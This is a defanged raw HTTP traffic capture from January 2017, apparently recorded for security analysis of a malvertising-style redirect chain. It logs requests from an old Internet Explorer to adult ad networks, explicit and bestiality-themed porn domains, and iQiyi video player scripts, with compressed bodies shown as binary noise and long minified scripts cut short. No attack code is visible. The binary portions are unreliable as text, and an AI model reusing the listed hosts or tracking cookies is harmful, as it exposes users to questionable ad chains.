Via: 1.1 varnish

X-Cache: HIT
..."5.10.0";"use strict";!function(a,b){a.Geetest=b(a,a.jQuery||a.Zept
o||a.ender||a.$),"function"==typeof define&&define.amd?define("Geetest
",["jquery"],function(c){return b(a,c)}):"undefined"!=typeof exports&&
(exports=b(a))}(this,function(a,b){function c(a,b){if(!(this instanceo
f c))return new c(a,b);if("string"!=typeof a.gt)throw new Error(e.gtEr
ror);var d=this;return d.id=o(),k.z(d.id),Q.z(d.id,d),k.B("error",ra.o
nError,d.id),d.config=B(a,d),d.config.protocol=d.config.https?"https:/
/":location.protocol "//","hXXps://"===d.config.protocol&&(d.config.ht
tps=!0),b||a.offline?(P(!1,a,d),a.popupbtnid&&d.bindOn("#" a.popupbtni
d)):G(d.config.apiserver "get.php?" m(a),P,d),O(d),d}function d(a,b){r
eturn a.type||(a.type="slide"),new d[a.type](a,b)}var e={gtError:"....
.....gt............",challengeError:".........challenge............",d
omSelectorError:"...............ID............DOM......",callbackError
:".................................",getError:"initGeetest............
........................gt...challenge"},f={};f.serial=function(a,b){v
ar c=a.length,d=[!1],e=1,f=function(g,h){return h?(d=[!0],void b.apply
(null,d)):(d[e]=g,e =1,void(e>c?b.apply(null,d):a[e-1](f)))};a[0](f
)},f.parallel=function(a,b){for(var c=a.length,d=[!1],e=0,f=function(a
){return function(f,g){if(e!==-1){if(g)return d=[!0],b.apply(null,d),d
=[],void(e=-1);e =1,d[a]=f,e===c&&b.apply(null,d)}}},g=1;g<=c;g =1)
a[g-1](f(g),g)};var g={},h={},i=function(a){return h[a]&&h[a].content}
,j=function(a,b,c){b in h?"loaded"===h[b].status?c&&c(h[b].content<<< skipped >>>

GET /ads?spot_id=2007013&rand=1853651284&impid=50_1484906105921674_21386&uuid=ed52589f-2015-4c94-939d-10ca076c51c4 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
310.............T.n.8.....q.@mI.%.leQ4i.As)./.D."-1.H.."._.C..>.e..
.@.......7. 7.........)....QT5.v..A...ep...I..lD..%/.=.....b.JKm..{4=k
.R[.UDkd(cB.........$..2x....Z9*.......:.. ...B...]6.."..[8K..Q=..8..w
 #...RF. ../SL...gW.'Y....og..jW.*g......X....3iJ..".p.?.;....Z8*...k.
.J...T....j.y...A......*./pN].W>.5.g..nn.........v..~Wg_>...;=..
.@~...A&A.=...V}......W......p.twG>.>>..'.j[SE..Pr..$........
...hM.........q._..?I..O*8N?G.4...pn..8o.L.....6.m...h.............B..
./.$.bh.....X.g.5..,"q.LWQ.G....UJp.,..5.r>.|............q..5.J....
...n\.p6]....Z..rI.x.kT....5Z(.....n.R..j.c\.Q.L...t.i.;.p....C...n:~.
....;...mD[..Ve.)....a^1.t..0...3 ....!....&...{#5e_t...8.o..<~0".3
....1.y..H(..6.K]..Z!....^o..D.....I.....J.J.O.........|...q...Mu...$.
Z].P....2...W...)..p..l..(..p~..../...Y'.....0..

GET /trade HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://zooxxxfree.com/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: freemomboy.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:05 GMT

Server: Apache/2.4.10 (Debian)

Content-Encoding: gzip

Vary: Accept-Encoding

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8
a05.............[.s........L'..E.|.zx.8..f..L.N..2..I...........|..e..
..O.K&.]...]@F.M~x.....?}@........w..|...a...1..w....nbt[..q&....4....
G...l...g.......I...j...P..L...`4...&".1...%h....`.=D!.8z.P....s.2.(GI
&V.@4...R....m.....Q.VY............dk...Hab....l[..R7V......-........e
V...s...Y.)...Y.hb.......R.s.....(.Q.jh....b..tQ.C!."..V.%.&..j...h...
..Ei$".....l......& B.b.>.......6.....@.C...]}.@.QJ.......5h.Qw..Hy
.*..d.k..^....s.....N.j0.gY.C...../.l...y.g....U.q.V..%......E........
Z...2......8Z.%.Q.b.. ...........-.pt.........E.e..}...Q....P...< .
t..J.......@%.f>D<.,.2u.Z..M....4J..Z. f6..m..#.m...../..#.f....
..@}..&t....)&.....ZgI.3..9J...w...v..<.Fc.i\.e....TN..f..YR..4..t.
.....g..<..F....E.mFh..!KaF.Q...-....Dn.[.}E.a.r.SfY...........b.T/
..J.&..'. .=.....4.R.9..R\......8....AV..)%F.k..BXq.Y....m....w.E.[...
.>....C.m..%....V..E).....^..aA.h. ).}8.........R.M .0..3.......t.q
m.*..*.Xn.2.pm.. .,.B.....#....OB.......q.,1........5....y$`...7...A.|
E.Tw..........=yx/ ...C(......hf......:...Oc.%..GT....u.Q....`m.L!M.a.
!O.o..QR.=........gR?NA."?.<.H6.....*......m...c-..*..:..dI.....v..
e.>..@.G\.=.".q....D.,.g1D.w..~*.|.{.../pu.9P.M...........(=...|..I
m.Se.f.v.rps&.m......t?..8.y.O..Z.O..O.... ..'H.Z...0>..........e.#
.c/..v......}........W...P....u..w.....c.....J.=i...q.....d......E}I.k
....V.....i.&...R..n.._..V0h.S..c.4.!1..!..f..~.......(7,J... M5....F.
...U.!e..V..VOi*z9..U..S...B. =_..R.....&rU..|.v...0h.......A.Rt}.}5d.
.......]>T...VF.T.M.VE\}Ui0....<..JS.r..t...t.n....hE..Tk...<<< skipped >>>

GET /ads?zone_id=1344021&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive

Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1689

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1344021" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1344021_1484906106" name="1344021_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=54_1484906106583286_7218&uuid=b3da0bc7-5356-4cf4-8cd7-941025
e2cf15" width="300" height="250" scrolling="no" frameborder="0" allowt
ransparency="true" marginwidth="0" marginheight="0" z_id="1344021" c_i
d="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://ad
s.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB63
oFYAAAAAAAAAAAVghQAFYIUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAAA<<< skipped >>>

GET /apis/msg/hasnew.action?count=5&agent_type=1&callback=window.Q.__callbacks__.cb3onixz HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: nl.notice.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8


HTTP/1.1 200 OK

Server: Tengine

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: text/plain;charset=UTF-8

Content-Length: 112

Connection: keep-alive

P3P: CP=CAO PSA OUR

Accept-Charset: utf-8
try{ window.Q.__callbacks__.cb3onixz ( {"data":{"unread":0,"unshow":0}
,"code":"A00000","msg":null});}catch(e){} HTTP/1.1 200 OK..Server: Ten
gine..Date: Fri, 20 Jan 2017 09:55:16 GMT..Content-Type: text/plain;ch
arset=UTF-8..Content-Length: 112..Connection: keep-alive..P3P: CP=CAO 
PSA OUR..Accept-Charset: utf-8..try{ window.Q.__callbacks__.cb3onixz (
 {"data":{"unread":0,"unshow":0},"code":"A00000","msg":null});}catch(e
){} ..

GET / HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://animalpornvideo.net/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Connection: Keep-Alive

Host: zooxxxfree.com


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:04 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: originatorRefererIDd=62513; expires=Sat, 21-Jan-2017 09:55:04 GMT; Max-Age=86400; path=/; domain=.zooxxxfree.com

Content-Encoding: gzip

Vary: Accept-Encoding

Keep-Alive: timeout=3, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8
62fe...............r#I.&.;)..`.......A..G..fT..l.qT..1.....w..$....w..
.. 2.{.d.dU.......Hs......$.w.M.OU.c..G.../.~~.N..N.......ls....O..?&g
t;.<P?<.?.fG1..D......d..4]......M..i?...//...y...D?.....7?n.._.
........H9.......YDq.FQ..0.m.F...ocq-Gb.>...e*y...x ~..|...2....Q.n
oo.$......R..c..b.He.n......N..#.....(..9..$.]1..9.6 .]..M.......^>
..fC.cC...-....,....5....Z.$]..~........l.GW.8....(...g.......?A.S.s..
........q...._....'4..x,.-Z.....g.._.L..,..={...<...>..I.q.%...Z
.6hi...s.>..p.3..6.c..P........<.....e.........D..3 ..F.q..._X*n
..4.a2...i.......F.!"....d*.....|.&.._Xt-b....l&.c..W..E..E".x...)..I.
..E.............WO`y....V... <../K :.....<.8.................e..
...R.3_..s . ....O..z&c1.b.'....&...ZX..s....L`A.....W.z.....ppD....m.
:.x..q\D00z9.zu.y.F.Sm/;.S....pd....g.).o.......&.Ouw..2Y...'C\..a..*.
3jz.gi.k'o.%.....o.......@..o7P=.........c.0:.........I.........qt8N..
o9...o"..e.....>yr...I..........._...f^A3..4c...ML...(KA. .....5...
bU...dSLT... s.l.2.........;.v..Tg.D...V.$...................sy..Z~.JK
.]L..S..............^.<...o.i..o.i...M[.j..Y...)..../J....-]....z..
 ........{7.m.M..1.i....C...1..uc._.o...5Md..h...S..[x.z.....8.Mg.^..|
...B.#..m6\.....Y..; ...}'s.I.hn...vyXM.g......t?....."o%"....w..[\...
t.....8/....M...?j..v.....G..o.$....dh.x5.....S.....=PHj.....d. ...U..
?Ucm...Vr...S....9..jn.rc...r_...t[..~.....}....tUZ...@.n.......33.).I
..o..?...N....T.(_......P^.o.>...r........<.*......U.x.ha..L.)..
.D8..VZ...|'.......7.e.*#0im.0....^..........n..@\...^.t..-"i..P..<<< skipped >>>

GET /ads?spot_id=2007013&rand=1853651284&impid=53_1484906106291540_30079&uuid=f6d622d2-74ce-4b18-9176-428ec07c8fc1 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1343941&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2ef.............T]..6.. n*.V*$v.H [....m...}.Ll...v..,..w..../........
....;.;w3..n.....){...Q.....5...W..q..a......&y..hw>Y}Ql.i.m..O.g..
jOB......P..%[`a..u..c...../Z9*.......;7.U(..km....w..ql..Yz<......
....6....V....(H.n.................6._...la.f..x)M..-...........u..XH.
|.........E...E./......(Y..22...$.H......(.(........%%.....v...1...`E.
.f.$..z..U..7.......K\.....p.|$ ..s:..=iI..<.^.s.4..$......^{}.A...
@..,......>....k.9o_>=.@,h.fx..E..&.Uy..kVK1.(]..8.dUR.. ....M..
........'..B.....6B.........y....S.jD..4z.NhU#.%u..oQw..oS..r.n.~..(..
F.`..{..../.=.Z^.p8m...C.....~]A..w.<........k".R#4p.]uLA7.ch.C.. .
l......a.....HM.o...F..{...np%.h...-bb4..j$....:H..A......=...C..).!.Z
..b.%.%....~5>.oK...l=.,B~2..".@(u..P.\.&......V..&.:.D...~........
~K.......0..

GET /irt?_iwt_id=&_iwt_UA=UA-iqiyi-000001&jsonp=MTIY5MRC6L5L4AG3&_iwt_p1=&_iwt_p2=&_iwt_p3=& HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: iqiyi.irs01.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: text/javascript

Content-Length: 43

Connection: close

Set-Cookie: _iwt_id=qrIman_egVifaJSxR1USTgA; expires=Sun, 20-Jan-19 09:55:11 GMT; domain=irs01.com; path=/

P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"

Cache-Control: private,no-store,no-cache,must-revalidate,proxy-revalidate,no-transform,max-age=0

Pragma: no-cache

Expires: 0
MTIY5MRC6L5L4AG3('qrIman_egVifaJSxR1USTgA')..

GET /banads/view.php?spaceid=2168566 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://pornvideo-box.com/trade

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: adspaces.ero-advertising.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.10.2

Date: Fri, 20 Jan 2017 09:55:05 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

X-Powered-By: PHP/5.4.34

P3P: CP="NOI DSP COR TAIa SAMa NOR"

Set-Cookie: uvid=54dc349e07b4f3666f64a04993a6e11b; expires=Sat, 20-Jan-2018 09:55:05 GMT; path=/; domain=.ero-advertising.com

Set-Cookie: uvid=54dc349e07b4f3666f64a04993a6e11b; expires=Sat, 20-Jan-2018 09:55:05 GMT; path=/; domain=.eroadvertising.com

X-Backend-Server: nl1-web213-70

Content-Encoding: gzip
674.............V......WX:..IFy.......V@.....J@.B(E.....8w{v{...I.....
.N..j.y.|....Ca...,M..B..:.zm(.......`.7v.L....R....O...1k}......Pe9..
A.x...>.....].....iZMkU.;..3..|...J`..6M.T*...h-f\..{<W.4.J.....
.....=.....P...c.l.=...p.BA.).......W....:t.....bd..)..:4.w\..JY....;e
.o..g>.0...YIB....Q..../....[..._...s..5..1.~2.(*....N...]......r,.
^..<3|O=..-...qa...y" R..Gi..l....r..W......C.7.>s.q....RI..lq.u
!.A..Y..{..F.......7*!..$0..O..x/.xaYQd.....-...<.B..../9t.$..[....
.D...L.....a......4=.0.1......6..b?.^..P..h....._J..!U.....o3..yk3.I-.
.gwh......i....5...T..C.L..j.._e..."V..{..|.:W...|.7P*...5...PI..?.x_.
o..Hur$.Il..B5...,..m......|v...M..<?..3...........H...O...~..,.}k.
/7....0....Nr.....u..=.\......*.B...0'...R].....dw...C.jN&..../...d..w
.[...Kq..9.2.`...._..`..HH.`3.V.~l..C.{H./...].nw/..{w..-.vj../....C..
CQ..P]..jW.....g....!...qm.b....{..|OS.;G..o(..6..>.w<._...`..W.
u..a ...n.k.o.....|.....It.$...u.h}R....N.....n.......,..q.lW....hx.o.
.v..f..qPg.....4M}.=n:......I.`..D. gt.....}y.M ..[w..Y3..8t..d...v&..
)yhzS..gU...z.T#s.~.S...q....#..&7u...%O.A.2.`l.....z..i"Qg.....Z!.B?x
..I} .uk5..T........mR.......2EUW.....~M...kO.G..*Z.n...&.\.2.Y.M8n4..
]..wv.8...0.a......\H......:Z.Pf.WS..l<..........m.Xx...U.v.....4?.
.,oM#....?R..e.....s.e._...M.C.....bn...'.....T.c....<i......[9zDZ.
.5..jE..({.p....$.........~.E...O 8z4j......1.W3....4......k.......dO.
..M{Q.;..DK.....*..a.;......e.....\8.........(K..K..(.\. ....l......H(
.6..*.sQ7.s.Km@S..R2v....M..i.R......ki..{O.$..M.(......./.z..WB..<<< skipped >>>

GET /js/player_v1/pcweb.wonder.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "2735432321"

Last-Modified: Thu, 19 Jan 2017 10:14:09 GMT

Content-Length: 301795

Server: Apache 1.3.29

Cache-Control: max-age=7200

Expires: Fri, 20 Jan 2017 11:55:07 GMT

Date: Fri, 20 Jan 2017 09:55:07 GMT

Connection: keep-alive
// Built by iQiyi-FE @1/19/2017, 6:13:56 PM.!function(e){function t(i)
{if(n[i])return n[i].exports;var o=n[i]={exports:{},id:i,loaded:!1};re
turn e[i].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var i=wi
ndow.QIYIPlayerTrunkLoader;window.QIYIPlayerTrunkLoader=function(n,a){
for(var c,r,p=0,d=[];p<n.length;p  )r=n[p],o[r]&&d.push.apply(d,o[r
]),o[r]=0;for(c in a)e[c]=a[c];for(i&&i(n,a);d.length;)d.shift().call(
null,t)};var n={},o={0:0};return t.async=function(e,i){if(0===o[e])ret
urn i.call(null,t);if(void 0!==o[e])o[e].push(i);else{o[e]=[i];var n=d
ocument.getElementsByTagName("head")[0],a=document.createElement("scri
pt");a.type="text/javascript",a.charset="utf-8",a.async=!0,a.src=t.p "
skin/skin." e ".a679d6f7.js",n.appendChild(a)}},t.m=e,t.c=n,t.p="http:
//static.iqiyi.com/js/player_v1/",t(0)}([function(e,t,i){var n=functio
n(e,t,i){var n=window,o=e(1),a=e(2),c=e(34),r="hXXp://static.iqiyi.com
/js/player/config/online.js",p=n.QiyiPlayerConfig.H5_PLAYER_URL,d=n.Qi
yiPlayerCallbacks||[],s=function(e){for(var t=0;t<d.length;t  )d[t]
.call(null,e);d=[]};d.length>0&&s(a),o.ready=function(e){if(e){o.is
Actived=!0;var t=function(e){var t=/\/. _(\w )\.js$/gi.exec(e);return 
t&&2===t.length?t[1]:""},i=function(e){var i=a.version,r=t(e);""!==r&&
i!==r?(n.QiyiPlayerCallbacks=d,delete o.spacename,c.seriesLoadScripts(
e,function(e){})):s(a)};-1===d.indexOf(e)&&d.push(e),n.QiyiPlayerConfi
g?i(p):c.seriesLoadScripts(r,function(t){t?i(p):"function"==typeof e&&
e(null)})}},i.exports=o}.call(t,i,t,e);void 0!==n&&(e.exports=n)},<<< skipped >>>

GET /js/qiyiV2/ugcBodanPlay_ver.js?3leiavi HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "53101165"

Last-Modified: Thu, 19 Jan 2017 10:06:27 GMT

Content-Length: 3512

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:10 GMT

Date: Fri, 20 Jan 2017 09:55:10 GMT

Connection: keep-alive
define("ver.js",["./config/config","./loader"],function(e,t,n){var a=e
("./config/config"),i=e("./loader"),r=a.templatePath,o=a.projectDebug;
n.exports={loadJob:function(e,t){i.load({jobName:e,config:a},t)},loadT
emplate:function(e,t,n){var a=("string"==typeof e?[e]:e).map(function(
e){return r "/" e ".js"});a&&(o||-1!=n.jobFile.indexOf("jobs/qitan")?i
.loadTemplate(a,t,n):seajs.use(a,t||function(){}))},loadModule:functio
n(){}}});..define("config/config.js",[],function(e,t,n){var a={project
Name:"qiyiV2",unitsvipPay_bankcardPay_floater_initVersion:"20170119180
153" ,unitsvipPay_payPasswordVersion:"20170119180153" ,unitsvipPay_ban
kcardPay_floaterVersion:"20170119180153" ,unitsvipPay_switchAccount_fl
oaterVersion:"20170119180153" ,unitsvipPay_webAlipay_floaterVersion:"2
0170119180153" ,unitsvipPay_qidouPay_floaterVersion:"20170119180153" ,
unitsvipPay_succeedPay_floaterVersion:"20170119180153" ,unitsvipPay_sc
roll_floaterVersion:"20170119180153" ,unitsvipPay_mobilePayVersion:"20
170119180153" ,unitsvipPay_platformPay_floaterVersion:"20170119180153"
 ,unitsvipPay_couponPay_floaterVersion:"20170119180153" ,unitsvipPay_p
ayPackages_floaterVersion:"20170119180153" ,unitsvipPay_payType_floate
rVersion:"20170119180153" ,unitsnavControlsVersion:"20170119180153" ,u
nitspcplayHistoryV2AsyncVersion:"20170119180153" ,unitspcUserRegistLog
inBoxManagerVersion:"20170119180153" ,projectVersion:"20170119180153",
templateVersion:"20170119180153",commonVersion:"20170119180153",develo
per:"liujinjuan",jobPath:"jobs/pc",commonPath:"common",templatePat<<< skipped >>>

GET /js/qiyiV2/20170119180153/common/common.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "4047258305"

Last-Modified: Thu, 19 Jan 2017 10:06:25 GMT

Content-Length: 292917

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:11 GMT

Date: Fri, 20 Jan 2017 09:55:11 GMT

Connection: keep-alive
define(function (){});..define("components/units/pageJob",["../action/
job"],function(e,t,n){var a=e("../action/job");n.exports=new a});..def
ine("components/action/job",["../../config/config"],function(e,t,n){va
r a=new Q.ic.InfoCenter({moduleName:"Job"}),i=e("../../config/config")
,r=Q.event.customEvent,o={};seajs.data.base "units/";var l=Q.Class("Jo
b",{construct:function(){this._oginjobs=[],this._asyncjobs=[],this._ex
ecjobs=[],this._execedjobs=[]},methods:{create:function(e,t){if(!t)thr
ow new Error("Job.create : obj is null.");return o[e]||(o[e]=t),this},
add:function(e,t){var n=o[e];if(!n)return this;for(var a=0;a<this._
oginjobs.length;a  )if(n=this._oginjobs[a],n.name==e)return this;retur
n this._oginjobs.push({name:e,param:t,object:o[e]}),this._execjobs=thi
s._oginjobs.slice(0),this},reset:function(){this._execjobs=this._oginj
obs.slice(0),this._execedjobs=[]},clear:function(){this._oginjobs=[],t
his._execjobs=[],this._execedjobs=[]},getJob:function(e){return o[e]},
load:function(e,t){var n=this,a=n.getJob(e);return-1===n._asyncjobs.in
dexOf(e)&&(n._asyncjobs.push(e),n.add(e),n._startJob(e)),t&&t.call(a,a
),a},sync:function(){this.load.apply(this,arguments)},async:function(t
,n){var a=this;i.projectDebug;var r="../../units/";i.projectDebug||(r=
"../../" i["units" t.replace(/\//g,"_") "Version"] "/units/"),e.async(
r t,function(e){a.sync(e,n)})},getJobs:function(){return this._oginjob
s},check:function(e){var t,n;try{e.getDependentDoms&&(t=e.getDependent
Doms()),n=e.check(t)}catch(a){}return n===!0},start:function(){var<<< skipped >>>

GET /js/qiyiV2/20170119180153/jobs/pc/ugcBodanPlay.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "728291075"

Last-Modified: Thu, 19 Jan 2017 10:06:24 GMT

Content-Length: 947049

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:12 GMT

Date: Fri, 20 Jan 2017 09:55:12 GMT

Connection: keep-alive
define("jobs/pc/ugcBodanPlay.js",["../../components/units/pageJob","..
/../units/base","../../units/playBase","../../units/slideWidgetForId",
"../../units/appDownload","../../units/tabForId","../../units/bodanCha
ngeInfo","../../units/ugcVideoRecommend","../../units/ugcBodanPlayPing
back","../../units/ugcBodanPlaySlide","../../units/ugcBodanRenderData"
,"../../units/bodanPlayAuth","../../units/bodanPlayerPopup","../../uni
ts/baiduPromotion","../../units/follow","../../units/ugcVideoListCircl
ePlay","../../units/movieTickets","../../units/activityNotice","../../
units/activityNoticeTopNav","../../units/ugcRelatedBodanPingback","../
../units/appleAdInPlay","../../units/playerPopup","../../units/safe/po
pVip"],function(e,t,a){var i=e("../../components/units/pageJob");e("..
/../units/base");var n=e("../../units/playBase"),o=[e("../../units/sli
